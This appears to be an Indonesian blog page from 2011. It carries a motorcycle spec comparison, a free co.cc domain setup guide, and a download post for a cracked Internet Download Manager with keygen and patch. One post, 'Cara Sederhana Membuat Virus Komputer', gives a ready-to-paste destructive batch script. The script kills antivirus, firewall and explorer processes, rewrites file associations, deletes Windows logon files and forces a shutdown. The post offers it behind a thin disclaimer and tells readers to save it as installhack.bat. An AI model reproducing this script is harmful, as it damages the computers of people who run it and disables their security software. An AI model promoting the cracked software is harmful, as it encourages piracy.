Sabtu, 04 Juni 2011

Yamaha V-Ixion Vs Bajaj Pulsar DTS-i

Membandingkan Yamaha V-Ixion 150 dan Bajaj Pulsar 180 DTS-i di sini harus dilakukan dengan hati-hati. Betapa tidak, kedua merek tidak saja berbeda pabrikan, tapi juga kapasitas mesin dan asal negara yang memiliki konteks historis-sosiologis yang berbeda. Apapun itu, keduanya sudah berani masuk ke pasar motor sport Indonesia 2007 yang bukan main panasnya. Karena itu sudah saatnya kita bandingkan agar konsumen bisa memiliki referensi sederhana.

Pada bagian ini kita hanya akan membandingkan beberapa fitur, baik pada mesin maupun non-mesin. Belum bisa kita bandingkan secara head-to-head beberapa hal terkait soal pengukuran-pengukuran yang bersifat matematis, seperti konsumsi bahan bakar, kecepatan maksimal, dan sebagainya. Perbandingan tersebut sudah saya buat di tempat lain, atau akan saya buat pada kesempatan lain kala data yang dibutuhkan sudah lengkap. Jika demikian lebih baik anda melihat perbandingan berikut sebagai referensi relatif saja hingga keduanya benar-benar sudah dirilis resmi on the road.

TEKNOLOGI MESIN
V-Ixion
Mesin : 4-valve SOHC water-cooled engine
Material : DiASil (die-cast aluminum cylinder)
Pembakaran : Injection (Programmed Electronic Fuel Injection PGM-FI).
Exhaust : Catalytic converter

Pulsar
Mesin : 2-valve SOHC with “DTS-i” technology
Material : Lighter forged piston, Roller bearing rocker arms Conventional
Pembakaran : Digital circuit (Trics III) for “DTS-i”.
Exhaust : ExhausTEC

V-Ixion: Skor 9

V-Ixion memperkenalkan teknol
ogi yang sukses pada Jupiter MX (meskipun lebih dulu dipakai oleh Suzuki untuk pasar Indonesia) yaitu penggunaan 4 klep SOHC. Membuat suplai bahan bakar dan udara lebih cepat masuk dan sempurna terbakar dibanding 2 klep. Keunggulannya pada kemampuan menghasilkan torsi lebih pada rpm tinggi.
Water cooler. Dimaksudkan sebagai solusi terhadap tingginya kompresi dan RPM yang berakibat panas berlebihan bagi motor yang bermesin sport.
Menggunakan material kuat anti gores DiASil (die-cast aluminum cylinder) dan piston almunium tempa yang lebih ringan. Membuat mesin ini memiliki daya tahan yang luar biasa terhadap putaran mesin yang tinggi karena ringan dan cepat melepas panas Dibuat secara ekslusif dari alumnium oleh teknologi terkini Yamaha berupa campuran 20% silicon aluminum alloy.
Penggunaan roller bearing jenis baru untuk rocker arms yang desain dan materialnya disesuaikan untuk memainkan 4 klep ganda SOHC secara lebih baik. Mengurangi friksi (gesekan) berlebihan sebagaimana lazimnya mesin motor 4 tak biasa.
Pembakaran menggunakan injeksi. Motor sport pertama yang menggunakan sitem injeksi yang didukung Biasanya didukung Throttle position sensor agar pembakaran lebih presisi untuk dan rendah emisi gas buang. Lebih hemat bahan bakar dan ramah lingkungan.
Catalytic converter: Piranti tambahan untuk mengurangi kadar polusi gas buang dengan lulus standar Euro II.
Mesin ini memiliki kompresi lebih tinggi sehingga bisa bermain pada RPM lebih tinggi. Menyiratkan nuansa sport yang kencang.

Pulsar: Skor 8

Pulsar memperkenalkan teknologi DTS-i (Digital Twin Spark Ignition)dengan busi ganda yang merupakan pertama di Indonesia. Kelebihannya pembakaran lebih sempurna dan tenaga lebih kuat.
Penggunaan karburator yang dipandu oleh digital circuit yang disebut Trics III (Third Generation Throttle Responsive Ignition System) guna mendukung efisensi pembakaran pada teknologi DTS-i/
Kapasitas silinder/volume mesin yang lebih besar sehingga menghasilkan torsi dan tenaga lebih besar yang sudah bisa dikail pada putaran mesin lebih rendah.
ExhausTEC. ExhausTEC singkatan dari Exhaust Torque Expansion Chamber yang merupakan desain sistem pembuangan (exhaust system) yang meningkatkan penyaluran daya (torsi) pada kecepatan rendah. Dirancang khusus dengan sebuah chamber dan diklaim mirip dengan kinerja teknologi turbo, yakni dengan memanfaatkan sisa campuran bahan bakar untuk dibakar kembali demi meningkatkan tenaga.
Tenaga dan torsi lebih besar yang bisa diraih pada putaran mesin lebih rendah. Pada kecepatan yang juga lebih rendah, torsi Pulsar sangat besar. Menyiratkan kemampuan akselerasi dan kekuatan membawa beban yang hebat.
Keunggulan V-Ixion jelas pada pada digunakannya teknologi injeksi, 4 klep, dan material komponen tahan panas untuk mengimbangi kompresi tinggi dan kecepatan putaran mesin. Water cooler tidak bisa sepenuhnya kita lihat sebagai kelebihan karena merupakan solusi terhadap ekstrimitas suhu dan putaran mesin yang bisa jadi berlebihan. Jika saja V-Ixion menganut teknologi DOHC, maka skornya bukan tidak mungkin adalah 10. Meskipun demikian, pulsar adalah lawan sepadan. Penggunaan teknologi DTS-i, Trics, dan TEC, hampir-hampir sama dengan efek yang dihasilkan oleh semua kelebihan teknologi V-Ixion. Bahkan pada sisi torsi dan penyaluran daya, tampaknya Pulsar lebih unggul. Kalaupun kalah dari V-Ixion, hanyalah karena Pulsar tidak menyebutkan secara khusus penggunaan material tingkat tinggi DiASil (dan forged piston) yang merupakan paten Yamaha. Wajar saja, toh Pulsar adalah motor tipe sport cruiser yang tidak perlu mencapai kompresi sangat tinggi ala sport DOHC yang ingin dipepet oleh V-Ixion dengan 4 klep SOHC-nya. Jadi wajar saja jika selisihnya hanya 1 poin.

FITUR DI LUAR MESIN

Non-Mesin
V-Ixion
Pulsar

Swing arm
Monoconventional
Monotube type gas suspension

Velg
Sport rims
Sport rims

Speedometer
Analog
Digital

Sasis
Deltabox
Double Cradle

Tampilan
Sporty
Sporty fighter

V-Ixion: Skor 7,5

Menggunakan swing arm dengan sistem link monosok. Namun sayang sekali masih menggunakan teknologi monosok konvensional yang sama dengan MX, dan bukan unitrak seperti Scorpio. Kemungkinan cepat amblas dan kurang responsif sangat tinggi.
Dilengkapi velg palang sehingga bernuansa sport lengkap dengan cakram depan.
Deltabox chassis merupakan kelebihan karena menyiratkan nuansa sport yang diipadu dengan desain tangki yang juga sporty dan manis. Kombinasi yang tak ada bandingannya di jajaran motor sport naked di Indonesia.
Pulsar: Skor 8,5

Menggunakan swingarm bersok ganda. Kelebihannya adalah dilengkapi sok ganda dengan teknologi gas (advanced monotube type gas suspension) yang lebih responsif bahkan dari monosok konvensional.
Sport rims. Dilengkapi velg palang 6 diameter 17 inchi yang desainnya meniru velg NSR Hornet yang terkenal ringan, kuat, dan sporty. Nuansa sportnya dilengkapi dengan cakram depan yang sama manisnya.
Panel Digital Speedometer yang manis. Mungkin hanya bisa diimbangi oleh produk Suzuki FU dan FXR, meskipun milik Bajaj ini lebih sporty ala moge.
Double Black Cradle chassis. Sasis yang lebih maju dari tipe berlian Honda Tiger meskipun masih kalah sporty dari sasis deltabox. Namun karena dimaksudkan untuk motor cruiser maka sangat tepat. Apalagi dikelir all black untuk menambah tampilan yang sporty.
Tampilan sporty black fighter bersama dengan desain tangki, tudung lampu dan headlamp ala mata serigala, dan buntut/lampu rem LED moge.
Di segala sektor non mesin, Pulsar lebih unggul tampilan daripada V-Ixion. Satu-satunya sedikit kelebihan V-Ixion atas Pulsar hanyalah pada diigunakannya sasis Deltabox yang serasi dengan tangki. Namun sport cruiser tidak harus ikut-ikutan model sportbike tanpa fairing bukan? Justru dengan desain yang sangat angresif, Pulsar memadukan dua aliran sport dan turing secara lebih seimbang sekaligus membidik salah satu model yang paling diminati dalam dunia motor kontemporer: Streetfighter. Kombinasi kaki-kaki, kelir, body depan hingga belakang, dan desain mesin, akan membuat anda sadar jika sedang berhadapan dengan sosok petarung sejati pada masanya!

KESIMPULAN:

V-Ixion: 16,5 Pulsar: 16,5
Source: kafemotor.org

Jumat, 03 Juni 2011

Cara membuat website gratis

Cara membuat website gratis – Sudah sering orang bilang bahwa membuat website itu mudah, apakah benar? bisa bnar dan bisa tidak tergantung dari pemahaman setiap orang tantang HTML dan CSS, semua itu wajib dimiliki oleh setiap webmastere di dunia ini dan tidak ada terkecualinya, jika berbicara tentang website apa saja yang membedakan antara website dengan blog, website adalah halaman di internet yang berguna untuk lambang perusahaan dan memiliki konten statis alias jarang sekali berubah berbeda sekali dengan blog karena blog biasa dimiliki oleh pribadi atau personal dimana sangat mudah untuk posting atau membuat berita terbaru, ok apakah anda ingin mebuat website? blog juga bisa dijadikan website lhoh, caranya kita tinggal cari yang bertemakan corporate nah di siru kita bisa mengedit ataupun menyeting segala sesuatunya dengan mudah.

Cara membuat website gratis dan mudah :

Pertama yang haus diakukan cukup mudah yaitu dengan membeli domain, yang dimaksud domain adalah alamat dari halaman kita di internet, jika anda ingin gratis maka silahkan register di bawah ini

Di kotak yang tersedia (lihat gambar 1), isi alamat yang diinginkan. Contoh. namasaya.co.cc. Klik “Check Availability”. Kalau “Available” (belum ada yang punya), teruskan prosesnya. Kalau sudah ada yang pakai, ulangi lagi dengan mengisi nama yang lain.

3. Klik “Continue to Registration” (lihat gambar 2)

4. Klik “Create an Account Now” di bagian paling bawah (lihat gambar 3).

5. Isi formulir (lihat gambar 4). Jangan lupa kasih tanda tik (centang) di bagian paling bawah pada “I accept the Terms of Service”

6. Klik “Create an account now.”

7. Proses daftar domain selesai (gambar 5).

Selanjutnya kita harus mensetting domain tersebut untuk diarahkan sesuai tujuan kita. Yang paling mudah adalah redirect atau URL forwarding.

Berikut sejumlah fungsi yang dapat kita lakukan untuk set-up domain co.cc kita:

Fungsi Redirect / URL Forwarding

1. Klik “Set-up”

2. Kasih tanda tik pada button (lobang) nomor 3. URL Forwarding (gambar 7)

3. Isi alamat blog Anda yang akan diredirect (gambar 8 [delapan])

4. Klik “Set Up”.

5. Ada tulisan ” Your change has been submitted.” Klik “OK”.

6. Selesai (gambar 9).

Cara Sederhana Membuat Virus Komputer


Virus komputer adalah sebuah program komputer yang dapat menyalin sendiri atau menggandakan dirinya sendiri dan menginfeksi system komputer yang secara umum bersifat merusak. Tetapi, taukah kamu bahwa virus komputer itu dapat dibuat secara sederhana, tulisan dibawah ini merupakan salah satu cara membuat virus komputer dengan cara yang sangat sederhana. Tetapi sebelum kamu membaca dan mempraktekkan tulisan tersebut perlu dipahami bahwa postingan ini hanya bersifat menambah pengetahuan kamu bukan sebagai hal yang berdampak negatif dan apapun yang terjadi setelah mempraktekkan tulisan dibawah ini, saya terlepas dari dampak yang terjadi..

Mudah cara untuk membuat kode Virus

Virus ini dapat menyerang:
1. Menhapus, NAVAPSVC.exe
2. Menhapus, Explorer.exe (taskbar dan ikon akan hilang)
3. Menhapus, zonelabs.exe
4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad)
5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player)
6. Menghapus Login / Logoff Screens

Hanya Copy kode di bawah ini lalu paste Pada Notepad:

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

Simpan di C: dengan nama installhack.bat
Selesai

semoga bermanfaat

Download IDM 6.05 Build 3 Free + Keygen + PatchKali ini IDS akan menjelaskan versi yg terbaru dari IDM 6.05 Build 3 Yang terbaru di versi 6.05 build

Kali ini IDS akan menjelaskan versi yg terbaru dari IDM 6.05 Build 3

Yang terbaru di versi 6.05 build 3 (3 Maret 2011):

  • Fixed bug dengan penggantian salah ekstensi file
  • Ditambahkan dukungan untuk antarmuka baru download di situs Filesonic
  • Video Peningkatan di IE9

Cara Installasi :
1. Uninstall VERSI SEBELUMNYA OF IDM
2. Reboot PC ATAU LAPTOP
3. Install IDM terbaru
4. Jalankan Program
5. Exit Program pada System TRAY
6. Copy Paste patch ke directory program
7. Run Patch
8. Run Program
9. Gunakan Keygen untuk mendapatkan Serial Number

Semoga Bermanfaat…….

IDM 6.05 Build 3 Free + Keygen + Patch

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Powered by Blogger